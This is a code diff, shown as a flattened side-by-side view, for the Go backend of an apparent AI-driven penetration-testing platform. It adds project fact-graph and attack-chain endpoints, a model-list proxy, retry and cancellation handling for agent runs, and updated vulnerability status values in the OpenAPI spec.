if fatalErr != nil {
runErr = fatalErr
}
cause := context.Cause(baseCtx) cause := context.Cause(baseCtx)
if errors.Is(cause, multiagent.ErrInterruptContinue) { if errors.Is(cause, multiagent.ErrInterruptContinue) {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
@@ -298,8 +279,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
"source": "interrupt_continue", "source": "interrupt_continue",
}) })
mainIterationOffset += segmentMainIterationMax mainIterationOffset += segmentMainIterationMax
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
transientRunAttempts = 0
timeoutCancel() timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause) h.tasks.BindTaskCancel(conversationID, cancelWithCause)
@@ -430,23 +409,32 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments) return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
}) })
result, runErr := multiagent.RunDeepAgent( curHist := prep.History
taskCtx, curMsg := prep.FinalMessage
h.config, var result *multiagent.RunResult
&h.config.MultiAgent, var runErr error
h.agent, for {
h.logger, result, runErr = multiagent.RunDeepAgent(
prep.ConversationID, taskCtx,
prep.FinalMessage, h.config,
prep.History, &h.config.MultiAgent,
prep.RoleTools, h.agent,
progressCallback, h.db,
h.agentsMarkdownDir, h.logger,
strings.TrimSpace(req.Orchestration), prep.ConversationID,
chatReasoningToClientIntent(req.Reasoning), h.conversationProjectID(prep.ConversationID),
h.projectBlackboardBlock(prep.ConversationID), curMsg,
) curHist,
if runErr != nil { prep.RoleTools,
progressCallback,
h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration),
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
if runErr == nil {
break
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result) h.persistEinoAgentTraceForResume(prep.ConversationID, result)
} }
+142 -37
View File
@@ -2,10 +2,8 @@ package handler
import ( import (
"net/http" "net/http"
"time"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/storage"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
@@ -15,17 +13,15 @@ import (
type OpenAPIHandler struct { type OpenAPIHandler struct {
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
resultStorage storage.ResultStorage
conversationHdlr *ConversationHandler conversationHdlr *ConversationHandler
agentHdlr *AgentHandler agentHdlr *AgentHandler
} }
// NewOpenAPIHandler 创建新的OpenAPI处理器 // NewOpenAPIHandler 创建新的OpenAPI处理器
func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, resultStorage storage.ResultStorage, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler { func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler {
return &OpenAPIHandler{ return &OpenAPIHandler{
db: db, db: db,
logger: logger, logger: logger,
resultStorage: resultStorage,
conversationHdlr: conversationHdlr, conversationHdlr: conversationHdlr,
agentHdlr: agentHdlr, agentHdlr: agentHdlr,
} }
@@ -237,7 +233,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "状态", "description": "状态",
"enum": []string{"open", "closed", "fixed"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"target": map[string]interface{}{ "target": map[string]interface{}{
"type": "string", "type": "string",
@@ -575,7 +571,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "状态", "description": "状态",
"enum": []string{"open", "closed", "fixed"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"type": map[string]interface{}{ "type": map[string]interface{}{
"type": "string", "type": "string",
@@ -1344,7 +1340,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"delete": map[string]interface{}{ "delete": map[string]interface{}{
"tags": []string{"对话管理"}, "tags": []string{"对话管理"},
"summary": "删除对话", "summary": "删除对话",
"description": "删除指定的对话及其所有相关数据(消息、漏洞等)。**此操作不可恢复**。", "description": "删除指定的对话及其会话数据(消息、攻击链等)。**漏洞记录会保留**,仅解除与会话的关联。**此操作不可恢复**。",
"operationId": "deleteConversation", "operationId": "deleteConversation",
"parameters": []map[string]interface{}{ "parameters": []map[string]interface{}{
{ {
@@ -2468,17 +2464,108 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"parameters": []map[string]interface{}{ "parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
{"name": "fact_key", "in": "query", "schema": map[string]interface{}{"type": "string"}}, {"name": "fact_key", "in": "query", "schema": map[string]interface{}{"type": "string"}},
{"name": "include_links", "in": "query", "schema": map[string]interface{}{"type": "boolean"}},
{"name": "include_link_counts", "in": "query", "schema": map[string]interface{}{"type": "boolean"}},
}, },
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "事实列表或单条"}}, "responses": map[string]interface{}{"200": map[string]interface{}{"description": "事实列表或单条(可含 link_counts / outgoing_links"}},
}, },
"post": map[string]interface{}{ "post": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "创建/更新事实", "operationId": "upsertProjectFactREST", "tags": []string{"项目管理"}, "summary": "创建/更新事实", "operationId": "upsertProjectFactREST",
"parameters": []map[string]interface{}{ "parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
}, },
"requestBody": map[string]interface{}{
"required": true,
"content": map[string]interface{}{
"application/json": map[string]interface{}{
"schema": map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"fact_key": map[string]interface{}{"type": "string"},
"summary": map[string]interface{}{"type": "string"},
"links": map[string]interface{}{
"type": "array",
"items": map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"to": map[string]interface{}{"type": "string"},
"type": map[string]interface{}{"type": "string"},
},
},
},
"links_text": map[string]interface{}{"type": "string", "description": "type: fact_key 每行一条"},
},
},
},
},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "成功"}}, "responses": map[string]interface{}{"200": map[string]interface{}{"description": "成功"}},
}, },
}, },
"/api/projects/{id}/fact-graph": map[string]interface{}{
"get": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "获取项目事实攻击路径图", "operationId": "getProjectFactGraph",
"parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
{"name": "view", "in": "query", "schema": map[string]interface{}{"type": "string", "enum": []string{"path", "full"}, "default": "path"}},
{"name": "exclude_deprecated", "in": "query", "schema": map[string]interface{}{"type": "boolean", "default": true}},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "nodes + edges"}},
},
},
"/api/projects/{id}/fact-edges": map[string]interface{}{
"get": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "列出项目全部事实边", "operationId": "listProjectFactEdges",
"parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "边列表"}},
},
"post": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "添加事实边", "operationId": "createProjectFactEdge",
"parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
},
"requestBody": map[string]interface{}{
"required": true,
"content": map[string]interface{}{
"application/json": map[string]interface{}{
"schema": map[string]interface{}{
"type": "object",
"required": []string{"source_fact_key", "target_fact_key", "edge_type"},
"properties": map[string]interface{}{
"source_fact_key": map[string]interface{}{"type": "string"},
"target_fact_key": map[string]interface{}{"type": "string"},
"edge_type": map[string]interface{}{"type": "string"},
"confidence": map[string]interface{}{"type": "string"},
},
},
},
},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "边已创建"}},
},
},
"/api/projects/{id}/fact-edges/{edgeId}": map[string]interface{}{
"delete": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "删除事实边", "operationId": "deleteProjectFactEdge",
"parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
{"name": "edgeId", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "删除成功"}},
},
},
"/api/projects/{id}/promote-attack-chain/{conversationId}": map[string]interface{}{
"post": map[string]interface{}{
"tags": []string{"项目管理"}, "summary": "将对话攻击链沉淀到项目事实图", "operationId": "promoteAttackChainToProject",
"parameters": []map[string]interface{}{
{"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
{"name": "conversationId", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}},
},
"responses": map[string]interface{}{"200": map[string]interface{}{"description": "沉淀结果(facts/edges/graph"}},
},
},
"/api/vulnerabilities": map[string]interface{}{ "/api/vulnerabilities": map[string]interface{}{
"get": map[string]interface{}{ "get": map[string]interface{}{
"tags": []string{"漏洞管理"}, "tags": []string{"漏洞管理"},
@@ -5034,6 +5121,51 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
}, },
}, },
}, },
"/api/config/list-models": map[string]interface{}{
"post": map[string]interface{}{
"tags": []string{"配置管理"},
"summary": "获取模型列表",
"description": "代理调用 OpenAI 兼容 GET /models,返回可用模型 id 列表。Claude 不支持。",
"operationId": "listModels",
"requestBody": map[string]interface{}{
"required": true,
"content": map[string]interface{}{
"application/json": map[string]interface{}{
"schema": map[string]interface{}{
"type": "object",
"required": []string{"api_key"},
"properties": map[string]interface{}{
"provider": map[string]interface{}{"type": "string", "description": "LLM提供商(openai/claude", "example": "openai"},
"base_url": map[string]interface{}{"type": "string", "description": "API基地址(可选)"},
"api_key": map[string]interface{}{"type": "string", "description": "API密钥"},
},
},
},
},
},
"responses": map[string]interface{}{
"200": map[string]interface{}{
"description": "获取结果",
"content": map[string]interface{}{
"application/json": map[string]interface{}{
"schema": map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"success": map[string]interface{}{"type": "boolean"},
"supported": map[string]interface{}{"type": "boolean"},
"error": map[string]interface{}{"type": "string"},
"models": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}},
"count": map[string]interface{}{"type": "integer"},
},
},
},
},
},
"400": map[string]interface{}{"description": "参数错误"},
"401": map[string]interface{}{"description": "未授权"},
},
},
},
// ==================== 终端 ==================== // ==================== 终端 ====================
"/api/terminal/run": map[string]interface{}{ "/api/terminal/run": map[string]interface{}{
@@ -6354,35 +6486,8 @@ func (h *OpenAPIHandler) GetConversationResults(c *gin.Context) {
vulnerabilities[i] = *v vulnerabilities[i] = *v
} }
// 获取执行结果(从MCP执行记录中获取 // 获取执行结果(历史大结果由 Eino reduction 落盘,此处不再聚合文件存储
executionResults := []map[string]interface{}{} executionResults := []map[string]interface{}{}
for _, msg := range messages {
if len(msg.MCPExecutionIDs) > 0 {
for _, execID := range msg.MCPExecutionIDs {
// 尝试从结果存储中获取执行结果
if h.resultStorage != nil {
result, err := h.resultStorage.GetResult(execID)
if err == nil && result != "" {
// 获取元数据以获取工具名称和创建时间
metadata, err := h.resultStorage.GetResultMetadata(execID)
toolName := "unknown"
createdAt := time.Now()
if err == nil && metadata != nil {
toolName = metadata.ToolName
createdAt = metadata.CreatedAt
}
executionResults = append(executionResults, map[string]interface{}{
"id": execID,
"toolName": toolName,
"status": "success",
"result": result,
"createdAt": createdAt.Format(time.RFC3339),
})
}
}
}
}
}
response := map[string]interface{}{ response := map[string]interface{}{
"conversationId": conv.ID, "conversationId": conv.ID,
+267 -23
View File
@@ -1,10 +1,12 @@
package handler package handler
import ( import (
"fmt"
"net/http" "net/http"
"strconv" "strconv"
"strings" "strings"
"cyberstrike-ai/internal/attackchain"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/project" "cyberstrike-ai/internal/project"
@@ -12,6 +14,16 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
const maxProjectDescriptionRunes = 4000
func clampProjectDescription(s string) string {
r := []rune(s)
if len(r) <= maxProjectDescriptionRunes {
return s
}
return string(r[:maxProjectDescriptionRunes])
}
// ProjectHandler 项目管理处理器。 // ProjectHandler 项目管理处理器。
type ProjectHandler struct { type ProjectHandler struct {
db *database.DB db *database.DB
@@ -48,7 +60,7 @@ func (h *ProjectHandler) CreateProject(c *gin.Context) {
} }
p := &database.Project{ p := &database.Project{
Name: strings.TrimSpace(req.Name), Name: strings.TrimSpace(req.Name),
Description: req.Description, Description: clampProjectDescription(req.Description),
ScopeJSON: req.ScopeJSON, ScopeJSON: req.ScopeJSON,
Status: strings.TrimSpace(req.Status), Status: strings.TrimSpace(req.Status),
} }
@@ -184,7 +196,7 @@ func (h *ProjectHandler) UpdateProject(c *gin.Context) {
} }
} }
if req.Description != nil { if req.Description != nil {
p.Description = *req.Description p.Description = clampProjectDescription(*req.Description)
} }
if req.ScopeJSON != nil { if req.ScopeJSON != nil {
p.ScopeJSON = *req.ScopeJSON p.ScopeJSON = *req.ScopeJSON
@@ -213,26 +225,102 @@ func (h *ProjectHandler) DeleteProject(c *gin.Context) {
c.JSON(http.StatusOK, gin.H{"success": true}) c.JSON(http.StatusOK, gin.H{"success": true})
} }
type factLinkRequest struct {
From string `json:"from"`
Type string `json:"type"`
Confidence string `json:"confidence,omitempty"`
}
type upsertFactRequest struct { type upsertFactRequest struct {
FactKey string `json:"fact_key" binding:"required"` FactKey string `json:"fact_key" binding:"required"`
Category string `json:"category"` Category string `json:"category"`
Summary string `json:"summary" binding:"required"` Summary string `json:"summary" binding:"required"`
Body string `json:"body"` Body string `json:"body"`
Confidence string `json:"confidence"` Confidence string `json:"confidence"`
Pinned bool `json:"pinned"` Pinned bool `json:"pinned"`
RelatedVulnerabilityID string `json:"related_vulnerability_id"` RelatedVulnerabilityID string `json:"related_vulnerability_id"`
Links []factLinkRequest `json:"links"`
LinksText *string `json:"links_text"`
} }
// updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。 // updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。
type updateFactRequest struct { type updateFactRequest struct {
FactKey *string `json:"fact_key"` FactKey *string `json:"fact_key"`
Category *string `json:"category"` Category *string `json:"category"`
Summary *string `json:"summary"` Summary *string `json:"summary"`
Body *string `json:"body"` Body *string `json:"body"`
Confidence *string `json:"confidence"` Confidence *string `json:"confidence"`
Pinned *bool `json:"pinned"` Pinned *bool `json:"pinned"`
RelatedVulnerabilityID *string `json:"related_vulnerability_id"` RelatedVulnerabilityID *string `json:"related_vulnerability_id"`
ClearBody bool `json:"clear_body"` ClearBody bool `json:"clear_body"`
Links *[]factLinkRequest `json:"links"`
LinksText *string `json:"links_text"`
}
func factLinksFromRequest(links []factLinkRequest, linksText *string) (*project.ParsedFactLinks, error) {
if len(links) > 0 {
parsed := &project.ParsedFactLinks{}
for i, l := range links {
from := strings.TrimSpace(l.From)
edgeType := strings.TrimSpace(l.Type)
if from == "" {
return nil, fmt.Errorf("links[%d] 须含 from", i)
}
if edgeType == "" {
return nil, fmt.Errorf("links[%d] 须含 type", i)
}
parsed.Incoming = append(parsed.Incoming, database.ProjectFactEdgeFromInput{
From: from, Type: edgeType, Confidence: strings.TrimSpace(l.Confidence),
})
}
return parsed, nil
}
if linksText != nil {
in, err := project.ParseFactLinksText(*linksText)
if err != nil {
return nil, err
}
return &project.ParsedFactLinks{Incoming: in}, nil
}
return &project.ParsedFactLinks{Incoming: []database.ProjectFactEdgeFromInput{}}, nil
}
type factWithLinksResponse struct {
*database.ProjectFact
OutgoingLinks []*database.ProjectFactEdge `json:"outgoing_links,omitempty"`
IncomingLinks []*database.ProjectFactEdge `json:"incoming_links,omitempty"`
LinkCounts *project.LinkCounts `json:"link_counts,omitempty"`
}
func (h *ProjectHandler) applyFactLinksAfterUpsert(projectID string, fact *database.ProjectFact, links []factLinkRequest, linksText *string, explicitLinks, parseBody bool) error {
if explicitLinks {
parsed, err := factLinksFromRequest(links, linksText)
if err != nil {
return err
}
return project.PersistFactLinksFromParsed(h.db, projectID, fact.FactKey, fact.SourceConversationID, parsed, true)
}
if parseBody {
inputs := project.ParseLinksFromBody(fact.Body)
if inputs == nil {
return nil
}
return project.PersistFactIncomingLinks(h.db, projectID, fact.FactKey, inputs, true)
}
return nil
}
func (h *ProjectHandler) factResponseWithLinks(projectID string, f *database.ProjectFact, includeLinks bool) interface{} {
if !includeLinks || f == nil {
return f
}
out, _ := h.db.ListOutgoingProjectFactEdges(projectID, f.FactKey)
in, _ := h.db.ListIncomingProjectFactEdges(projectID, f.FactKey)
return &factWithLinksResponse{
ProjectFact: f,
OutgoingLinks: out,
IncomingLinks: in,
}
} }
// ListFacts GET /api/projects/:id/facts fact_key 查询参数可获取单条详情) // ListFacts GET /api/projects/:id/facts fact_key 查询参数可获取单条详情)
@@ -244,7 +332,8 @@ func (h *ProjectHandler) ListFacts(c *gin.Context) {
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
return return
} }
c.JSON(http.StatusOK, f) includeLinks := c.Query("include_links") == "1" || c.Query("include_links") == "true"
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, f, includeLinks))
return return
} }
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100")) limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100"))
@@ -275,7 +364,52 @@ func (h *ProjectHandler) ListFacts(c *gin.Context) {
} }
list = filtered list = filtered
} }
c.JSON(http.StatusOK, list) includeLinkCounts := c.Query("include_link_counts") == "1" || c.Query("include_link_counts") == "true"
if !includeLinkCounts {
c.JSON(http.StatusOK, list)
return
}
counts, err := project.LoadProjectFactLinkCounts(h.db, projectID)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
out := make([]factWithLinksResponse, 0, len(list))
for _, f := range list {
item := factWithLinksResponse{ProjectFact: f}
if c, ok := counts[f.FactKey]; ok {
cc := c
item.LinkCounts = &cc
}
out = append(out, item)
}
c.JSON(http.StatusOK, out)
}
// GetFactGraph GET /api/projects/:id/fact-graph?view=path|full
func (h *ProjectHandler) GetFactGraph(c *gin.Context) {
projectID := c.Param("id")
if _, err := h.db.GetProject(projectID); err != nil {
c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"})
return
}
view := c.DefaultQuery("view", "path")
excludeDeprecated := true
if v := c.Query("exclude_deprecated"); v == "0" || v == "false" {
excludeDeprecated = false
}
graph, err := project.BuildProjectFactGraph(h.db, projectID, view, excludeDeprecated)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if graph.Nodes == nil {
graph.Nodes = []database.ProjectFactGraphNode{}
}
if graph.Edges == nil {
graph.Edges = []database.ProjectFactGraphEdge{}
}
c.JSON(http.StatusOK, graph)
} }
// CreateFact POST /api/projects/:id/facts // CreateFact POST /api/projects/:id/facts
@@ -285,8 +419,9 @@ func (h *ProjectHandler) CreateFact(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return return
} }
projectID := c.Param("id")
f := &database.ProjectFact{ f := &database.ProjectFact{
ProjectID: c.Param("id"), ProjectID: projectID,
FactKey: req.FactKey, FactKey: req.FactKey,
Category: req.Category, Category: req.Category,
Summary: req.Summary, Summary: req.Summary,
@@ -300,16 +435,24 @@ func (h *ProjectHandler) CreateFact(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return return
} }
c.JSON(http.StatusOK, created) explicitLinks := req.Links != nil || req.LinksText != nil
if err := h.applyFactLinksAfterUpsert(projectID, created, req.Links, req.LinksText, explicitLinks, !explicitLinks); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
created, _ = h.db.GetProjectFactByKey(projectID, created.FactKey)
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, created, true))
} }
// UpdateFact PUT /api/projects/:id/facts/:factId // UpdateFact PUT /api/projects/:id/facts/:factId
func (h *ProjectHandler) UpdateFact(c *gin.Context) { func (h *ProjectHandler) UpdateFact(c *gin.Context) {
projectID := c.Param("id")
existing, err := h.db.GetProjectFact(c.Param("factId")) existing, err := h.db.GetProjectFact(c.Param("factId"))
if err != nil || existing.ProjectID != c.Param("id") { if err != nil || existing.ProjectID != projectID {
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"}) c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
return return
} }
oldFactKey := existing.FactKey
var req updateFactRequest var req updateFactRequest
if err := c.ShouldBindJSON(&req); err != nil { if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
@@ -345,7 +488,29 @@ func (h *ProjectHandler) UpdateFact(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return return
} }
c.JSON(http.StatusOK, updated) if oldFactKey != updated.FactKey {
if err := h.db.RenameProjectFactKeyEdges(projectID, oldFactKey, updated.FactKey); err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
}
if req.Links != nil || req.LinksText != nil {
var links []factLinkRequest
if req.Links != nil {
links = *req.Links
}
if err := h.applyFactLinksAfterUpsert(projectID, updated, links, req.LinksText, true, false); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
} else if req.ClearBody || req.Body != nil {
if err := h.applyFactLinksAfterUpsert(projectID, updated, nil, nil, false, true); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
}
updated, _ = h.db.GetProjectFactByKey(projectID, updated.FactKey)
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, updated, true))
} }
// DeleteFact DELETE /api/projects/:id/facts/:factId // DeleteFact DELETE /api/projects/:id/facts/:factId
@@ -398,3 +563,82 @@ func (h *ProjectHandler) RestoreFact(c *gin.Context) {
} }
c.JSON(http.StatusOK, gin.H{"success": true}) c.JSON(http.StatusOK, gin.H{"success": true})
} }
type createFactEdgeRequest struct {
SourceFactKey string `json:"source_fact_key" binding:"required"`
TargetFactKey string `json:"target_fact_key" binding:"required"`
EdgeType string `json:"edge_type" binding:"required"`
Confidence string `json:"confidence"`
}
// ListFactEdges GET /api/projects/:id/fact-edges
func (h *ProjectHandler) ListFactEdges(c *gin.Context) {
projectID := c.Param("id")
edges, err := h.db.ListProjectFactEdgesByProject(projectID)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if edges == nil {
edges = []*database.ProjectFactEdge{}
}
c.JSON(http.StatusOK, edges)
}
// CreateFactEdge POST /api/projects/:id/fact-edges
func (h *ProjectHandler) CreateFactEdge(c *gin.Context) {
projectID := c.Param("id")
var req createFactEdgeRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
edge, err := h.db.AddProjectFactEdge(projectID, database.ProjectFactEdgeInput{
To: req.TargetFactKey,
Type: req.EdgeType,
Confidence: req.Confidence,
}, req.SourceFactKey, "")
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
if f, err := h.db.GetProjectFactByKey(projectID, req.TargetFactKey); err == nil {
in, _ := h.db.ListIncomingProjectFactEdges(projectID, req.TargetFactKey)
f.Body = project.SyncBodyLinksSection(f.Body, in)
_, _ = h.db.UpsertProjectFact(f)
}
c.JSON(http.StatusOK, edge)
}
// DeleteFactEdge DELETE /api/projects/:id/fact-edges/:edgeId
func (h *ProjectHandler) DeleteFactEdge(c *gin.Context) {
projectID := c.Param("id")
edgeID := c.Param("edgeId")
edge, err := h.db.GetProjectFactEdge(edgeID)
if err != nil || edge.ProjectID != projectID {
c.JSON(http.StatusNotFound, gin.H{"error": "边不存在"})
return
}
if err := h.db.DeleteProjectFactEdge(edgeID); err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if f, err := h.db.GetProjectFactByKey(projectID, edge.TargetFactKey); err == nil {
in, _ := h.db.ListIncomingProjectFactEdges(projectID, edge.TargetFactKey)
f.Body = project.SyncBodyLinksSection(f.Body, in)
_, _ = h.db.UpsertProjectFact(f)
}
c.JSON(http.StatusOK, gin.H{"success": true})
}
// PromoteAttackChain POST /api/projects/:id/promote-attack-chain/:conversationId
func (h *ProjectHandler) PromoteAttackChain(c *gin.Context) {
projectID := c.Param("id")
conversationID := c.Param("conversationId")
result, err := attackchain.PromoteToProject(h.db, projectID, conversationID)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, result)
}
+16
View File
@@ -30,3 +30,19 @@ func (h *AgentHandler) projectBlackboardBlock(conversationID string) string {
} }
return strings.TrimSpace(block) return strings.TrimSpace(block)
} }
// conversationProjectID 返回对话绑定的项目 ID;未绑定或查询失败时返回空字符串。
func (h *AgentHandler) conversationProjectID(conversationID string) string {
if h == nil || h.db == nil {
return ""
}
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return ""
}
projectID, err := h.db.GetConversationProjectID(conversationID)
if err != nil {
return ""
}
return strings.TrimSpace(projectID)
}
+4 -1
View File
@@ -447,7 +447,7 @@ func (h *RobotHandler) cmdUnbindProject(platform, userID string) string {
} }
func (h *RobotHandler) cmdList() string { func (h *RobotHandler) cmdList() string {
convs, err := h.db.ListConversations(50, 0, "") convs, err := h.db.ListConversations(50, 0, "", "")
if err != nil { if err != nil {
return "获取对话列表失败: " + err.Error() return "获取对话列表失败: " + err.Error()
} }
@@ -594,6 +594,9 @@ func (h *RobotHandler) cmdDelete(platform, userID, convID string) string {
h.mu.Unlock() h.mu.Unlock()
h.deleteSessionBinding(sk) h.deleteSessionBinding(sk)
} }
if h.agentHandler != nil {
h.agentHandler.CancelRunningTaskForConversation(convID)
}
if err := h.db.DeleteConversation(convID); err != nil { if err := h.db.DeleteConversation(convID); err != nil {
return "删除失败: " + err.Error() return "删除失败: " + err.Error()
} }
+68
View File
@@ -37,6 +37,11 @@ type AgentTask struct {
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空) // InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
InterruptContinueNote string `json:"-"` InterruptContinueNote string `json:"-"`
// activeEinoExecuteCancel 当前进行中的 Eino filesystem execute 取消函数(与 MCP 工具并行,供中断并继续)
activeEinoExecuteCancel context.CancelFunc
// activeEinoExecuteAbortNote AbortActiveEinoExecute 写入的用户说明,由 execute 收尾时合并进工具结果
activeEinoExecuteAbortNote string
cancel func(error) cancel func(error)
} }
@@ -70,6 +75,69 @@ func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID str
} }
} }
// RegisterActiveEinoExecute 登记进行中的 Eino filesystem execute(每会话同时仅一条)。
func (m *AgentTaskManager) RegisterActiveEinoExecute(conversationID string, cancel context.CancelFunc) {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" || cancel == nil {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
t.activeEinoExecuteCancel = cancel
t.activeEinoExecuteAbortNote = ""
}
}
// UnregisterActiveEinoExecute execute 正常结束或已取消后清除登记。
func (m *AgentTaskManager) UnregisterActiveEinoExecute(conversationID string) {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
t.activeEinoExecuteCancel = nil
t.activeEinoExecuteAbortNote = ""
}
}
// AbortActiveEinoExecute 终止当前 Eino execute 并暂存用户说明(与 MCP 工具终止一致)。
func (m *AgentTaskManager) AbortActiveEinoExecute(conversationID, note string) bool {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return false
}
m.mu.Lock()
t, ok := m.tasks[conversationID]
if !ok || t == nil || t.activeEinoExecuteCancel == nil {
m.mu.Unlock()
return false
}
t.activeEinoExecuteAbortNote = strings.TrimSpace(note)
cancel := t.activeEinoExecuteCancel
m.mu.Unlock()
cancel()
return true
}
// TakeEinoExecuteAbortNote 读取并清空 execute 终止说明(execute 收尾时调用一次)。
func (m *AgentTaskManager) TakeEinoExecuteAbortNote(conversationID string) string {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return ""
